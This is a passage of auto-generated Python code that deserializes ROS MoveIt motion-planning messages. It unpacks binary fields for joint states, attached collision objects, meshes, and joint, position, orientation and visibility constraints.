_x.goal.request.start_state.joint_state.header.seq, _x.goal.request.start_state.joint_state.header.stamp.secs, _x.goal.request.start_state.joint_state.header.stamp.nsecs,) = _get_struct_6d3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.start_state.joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.request.start_state.joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.joint_state.name = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.request.start_state.joint_state.name.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.request.start_state.joint_state.position = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.request.start_state.joint_state.velocity = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.request.start_state.joint_state.effort = struct.unpack(pattern, str[start:end]) _x = self start = end end += 12 (_x.goal.request.start_state.multi_dof_joint_state.header.seq, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.secs, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) 
start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.start_state.multi_dof_joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.request.start_state.multi_dof_joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.request.start_state.multi_dof_joint_state.joint_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.transforms = [] for i in range(0, length): val1 = geometry_msgs.msg.Transform() _v149 = val1.translation _x = _v149 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v150 = val1.rotation _x = _v150 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.transforms.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.twist = [] for i in range(0, length): val1 = geometry_msgs.msg.Twist() _v151 = val1.linear _x = _v151 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v152 = val1.angular _x = _v152 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.twist.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.wrench = [] for i in range(0, length): val1 = geometry_msgs.msg.Wrench() _v153 = val1.force _x = _v153 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v154 = val1.torque _x = _v154 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.request.start_state.multi_dof_joint_state.wrench.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.start_state.attached_collision_objects = [] for i in range(0, length): val1 = moveit_msgs.msg.AttachedCollisionObject() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _v155 = val1.object _v156 = _v155.header start = end end += 4 (_v156.seq,) = _get_struct_I().unpack(str[start:end]) _v157 = _v156.stamp _x = _v157 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v156.frame_id = str[start:end].decode('utf-8') else: _v156.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v155.id = str[start:end].decode('utf-8') else: _v155.id = str[start:end] _v158 = _v155.type start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v158.key = str[start:end].decode('utf-8') else: _v158.key = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v158.db = str[start:end].decode('utf-8') else: 
_v158.db = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.primitives = [] for i in range(0, length): val3 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val3.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.dimensions = struct.unpack(pattern, str[start:end]) _v155.primitives.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.primitive_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v159 = val3.position _x = _v159 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v160 = val3.orientation _x = _v160 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v155.primitive_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.meshes = [] for i in range(0, length): val3 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.triangles = [] for i in range(0, length): val4 = shape_msgs.msg.MeshTriangle() start = end end += 12 val4.vertex_indices = _get_struct_3I().unpack(str[start:end]) val3.triangles.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.vertices = [] for i in range(0, length): val4 = geometry_msgs.msg.Point() _x = val4 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val3.vertices.append(val4) _v155.meshes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.mesh_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v161 = val3.position _x = _v161 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v162 = val3.orientation _x = _v162 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v155.mesh_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.planes = [] for i in range(0, length): val3 = shape_msgs.msg.Plane() start = end end += 32 val3.coef = _get_struct_4d().unpack(str[start:end]) _v155.planes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.plane_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v163 = val3.position _x = _v163 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v164 = val3.orientation _x = _v164 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v155.plane_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.subframe_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v155.subframe_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v155.subframe_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v165 = val3.position _x = _v165 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v166 = val3.orientation _x = _v166 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v155.subframe_poses.append(val3) start = end end += 1 (_v155.operation,) = _get_struct_b().unpack(str[start:end]) start = end end += 4 (length,) = 
_struct_I.unpack(str[start:end]) val1.touch_links = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2 = str[start:end].decode('utf-8') else: val2 = str[start:end] val1.touch_links.append(val2) _v167 = val1.detach_posture _v168 = _v167.header start = end end += 4 (_v168.seq,) = _get_struct_I().unpack(str[start:end]) _v169 = _v168.stamp _x = _v169 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v168.frame_id = str[start:end].decode('utf-8') else: _v168.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v167.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v167.joint_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v167.points = [] for i in range(0, length): val3 = trajectory_msgs.msg.JointTrajectoryPoint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.positions = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.velocities = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.accelerations = struct.unpack(pattern, str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.effort = struct.unpack(pattern, str[start:end]) _v170 = val3.time_from_start _x = _v170 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) _v167.points.append(val3) start = end end += 8 (val1.weight,) = _get_struct_d().unpack(str[start:end]) self.goal.request.start_state.attached_collision_objects.append(val1) start = end end += 1 (self.goal.request.start_state.is_diff,) = _get_struct_B().unpack(str[start:end]) self.goal.request.start_state.is_diff = bool(self.goal.request.start_state.is_diff) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.goal_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.Constraints() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.name = str[start:end].decode('utf-8') else: val1.name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.joint_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.JointConstraint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.joint_name = str[start:end].decode('utf-8') else: val2.joint_name = str[start:end] _x = val2 start = end end += 32 (_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight,) = _get_struct_4d().unpack(str[start:end]) val1.joint_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.position_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.PositionConstraint() _v171 = val2.header start = end end += 4 (_v171.seq,) = 
_get_struct_I().unpack(str[start:end]) _v172 = _v171.stamp _x = _v172 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v171.frame_id = str[start:end].decode('utf-8') else: _v171.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _v173 = val2.target_point_offset _x = _v173 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v174 = val2.constraint_region start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v174.primitives = [] for i in range(0, length): val4 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val4.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val4.dimensions = struct.unpack(pattern, str[start:end]) _v174.primitives.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v174.primitive_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v175 = val4.position _x = _v175 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v176 = val4.orientation _x = _v176 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v174.primitive_poses.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v174.meshes = [] for i in range(0, length): val4 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.triangles = [] for i in range(0, length): val5 = shape_msgs.msg.MeshTriangle() start = end end += 12 val5.vertex_indices = _get_struct_3I().unpack(str[start:end]) val4.triangles.append(val5) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.vertices = [] for i in range(0, length): val5 = geometry_msgs.msg.Point() _x = val5 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val4.vertices.append(val5) _v174.meshes.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v174.mesh_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v177 = val4.position _x = _v177 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v178 = val4.orientation _x = _v178 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v174.mesh_poses.append(val4) start = end end += 8 (val2.weight,) = _get_struct_d().unpack(str[start:end]) val1.position_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.orientation_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.OrientationConstraint() _v179 = val2.header start = end end += 4 (_v179.seq,) = _get_struct_I().unpack(str[start:end]) _v180 = _v179.stamp _x = _v180 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v179.frame_id = str[start:end].decode('utf-8') else: _v179.frame_id = str[start:end] _v181 = val2.orientation _x = _v181 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (length,) = 
_struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _x = val2 start = end end += 32 (_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight,) = _get_struct_4d().unpack(str[start:end]) val1.orientation_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.visibility_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.VisibilityConstraint() start = end end += 8 (val2.target_radius,) = _get_struct_d().unpack(str[start:end]) _v182 = val2.target_pose _v183 = _v182.header start = end end += 4 (_v183.seq,) = _get_struct_I().unpack(str[start:end]) _v184 = _v183.stamp _x = _v184 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v183.frame_id = str[start:end].decode('utf-8') else: _v183.frame_id = str[start:end] _v185 = _v182.pose _v186 = _v185.position _x = _v186 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v187 = _v185.orientation _x = _v187 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (val2.cone_sides,) = _get_struct_i().unpack(str[start:end]) _v188 = val2.sensor_pose _v189 = _v188.header start = end end += 4 (_v189.seq,) = _get_struct_I().unpack(str[start:end]) _v190 = _v189.stamp _x = _v190 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v189.frame_id = str[start:end].decode('utf-8') else: _v189.frame_id = str[start:end] _v191 = _v188.pose _v192 = _v191.position _x = _v192 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v193 = _v191.orientation _x = _v193 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _x = val2 start = end end += 25 (_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight,) = _get_struct_2dBd().unpack(str[start:end]) val1.visibility_constraints.append(val2) self.goal.request.goal_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.path_constraints.name = str[start:end].decode('utf-8') else: self.goal.request.path_constraints.name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.joint_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.JointConstraint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.joint_name = str[start:end].decode('utf-8') else: val1.joint_name = str[start:end] _x = val1 start = end end += 32 (_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight,) = _get_struct_4d().unpack(str[start:end]) self.goal.request.path_constraints.joint_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.position_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.PositionConstraint() _v194 = val1.header start = end end += 4 (_v194.seq,) = _get_struct_I().unpack(str[start:end]) _v195 = _v194.stamp _x = _v195 start = end end += 8 (_x.secs, _x.nsecs,) = 
_get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v194.frame_id = str[start:end].decode('utf-8') else: _v194.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _v196 = val1.target_point_offset _x = _v196 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v197 = val1.constraint_region start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v197.primitives = [] for i in range(0, length): val3 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val3.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.dimensions = struct.unpack(pattern, str[start:end]) _v197.primitives.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v197.primitive_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v198 = val3.position _x = _v198 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v199 = val3.orientation _x = _v199 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v197.primitive_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v197.meshes = [] for i in range(0, length): val3 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.triangles = [] for i in range(0, length): val4 = shape_msgs.msg.MeshTriangle() start = end end += 12 val4.vertex_indices = _get_struct_3I().unpack(str[start:end]) val3.triangles.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.vertices = [] for i in range(0, length): val4 = geometry_msgs.msg.Point() _x = val4 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val3.vertices.append(val4) _v197.meshes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v197.mesh_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v200 = val3.position _x = _v200 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v201 = val3.orientation _x = _v201 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v197.mesh_poses.append(val3) start = end end += 8 (val1.weight,) = _get_struct_d().unpack(str[start:end]) self.goal.request.path_constraints.position_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.orientation_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.OrientationConstraint() _v202 = val1.header start = end end += 4 (_v202.seq,) = _get_struct_I().unpack(str[start:end]) _v203 = _v202.stamp _x = _v203 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v202.frame_id = str[start:end].decode('utf-8') else: _v202.frame_id = str[start:end] _v204 = val1.orientation _x = _v204 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: 
val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _x = val1 start = end end += 32 (_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight,) = _get_struct_4d().unpack(str[start:end]) self.goal.request.path_constraints.orientation_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.path_constraints.visibility_constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.VisibilityConstraint() start = end end += 8 (val1.target_radius,) = _get_struct_d().unpack(str[start:end]) _v205 = val1.target_pose _v206 = _v205.header start = end end += 4 (_v206.seq,) = _get_struct_I().unpack(str[start:end]) _v207 = _v206.stamp _x = _v207 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v206.frame_id = str[start:end].decode('utf-8') else: _v206.frame_id = str[start:end] _v208 = _v205.pose _v209 = _v208.position _x = _v209 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v210 = _v208.orientation _x = _v210 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (val1.cone_sides,) = _get_struct_i().unpack(str[start:end]) _v211 = val1.sensor_pose _v212 = _v211.header start = end end += 4 (_v212.seq,) = _get_struct_I().unpack(str[start:end]) _v213 = _v212.stamp _x = _v213 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v212.frame_id = str[start:end].decode('utf-8') else: _v212.frame_id = str[start:end] _v214 = _v211.pose _v215 = _v214.position _x = _v215 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v216 = _v214.orientation _x = _v216 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _x = val1 start = end end += 25 (_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight,) = _get_struct_2dBd().unpack(str[start:end]) self.goal.request.path_constraints.visibility_constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.trajectory_constraints.constraints = [] for i in range(0, length): val1 = moveit_msgs.msg.Constraints() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.name = str[start:end].decode('utf-8') else: val1.name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.joint_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.JointConstraint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.joint_name = str[start:end].decode('utf-8') else: val2.joint_name = str[start:end] _x = val2 start = end end += 32 (_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight,) = _get_struct_4d().unpack(str[start:end]) val1.joint_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.position_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.PositionConstraint() _v217 = val2.header start = end end += 4 (_v217.seq,) = _get_struct_I().unpack(str[start:end]) _v218 = _v217.stamp _x = _v218 start = end end += 8 (_x.secs, _x.nsecs,) = 
_get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v217.frame_id = str[start:end].decode('utf-8') else: _v217.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _v219 = val2.target_point_offset _x = _v219 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v220 = val2.constraint_region start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v220.primitives = [] for i in range(0, length): val4 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val4.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val4.dimensions = struct.unpack(pattern, str[start:end]) _v220.primitives.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v220.primitive_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v221 = val4.position _x = _v221 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v222 = val4.orientation _x = _v222 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v220.primitive_poses.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v220.meshes = [] for i in range(0, length): val4 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.triangles = [] for i in range(0, length): val5 = shape_msgs.msg.MeshTriangle() start = end end += 12 val5.vertex_indices = _get_struct_3I().unpack(str[start:end]) val4.triangles.append(val5) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val4.vertices = [] for i in range(0, length): val5 = geometry_msgs.msg.Point() _x = val5 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val4.vertices.append(val5) _v220.meshes.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v220.mesh_poses = [] for i in range(0, length): val4 = geometry_msgs.msg.Pose() _v223 = val4.position _x = _v223 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v224 = val4.orientation _x = _v224 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v220.mesh_poses.append(val4) start = end end += 8 (val2.weight,) = _get_struct_d().unpack(str[start:end]) val1.position_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.orientation_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.OrientationConstraint() _v225 = val2.header start = end end += 4 (_v225.seq,) = _get_struct_I().unpack(str[start:end]) _v226 = _v225.stamp _x = _v226 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v225.frame_id = str[start:end].decode('utf-8') else: _v225.frame_id = str[start:end] _v227 = val2.orientation _x = _v227 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: 
val2.link_name = str[start:end] _x = val2 start = end end += 32 (_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight,) = _get_struct_4d().unpack(str[start:end]) val1.orientation_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.visibility_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.VisibilityConstraint() start = end end += 8 (val2.target_radius,) = _get_struct_d().unpack(str[start:end]) _v228 = val2.target_pose _v229 = _v228.header start = end end += 4 (_v229.seq,) = _get_struct_I().unpack(str[start:end]) _v230 = _v229.stamp _x = _v230 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v229.frame_id = str[start:end].decode('utf-8') else: _v229.frame_id = str[start:end] _v231 = _v228.pose _v232 = _v231.position _x = _v232 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v233 = _v231.orientation _x = _v233 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (val2.cone_sides,) = _get_struct_i().unpack(str[start:end]) _v234 = val2.sensor_pose _v235 = _v234.header start = end end += 4 (_v235.seq,) = _get_struct_I().unpack(str[start:end]) _v236 = _v235.stamp _x = _v236 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v235.frame_id = str[start:end].decode('utf-8') else: _v235.frame_id = str[start:end] _v237 = _v234.pose _v238 = _v237.position _x = _v238 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v239 = _v237.orientation _x = _v239 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = 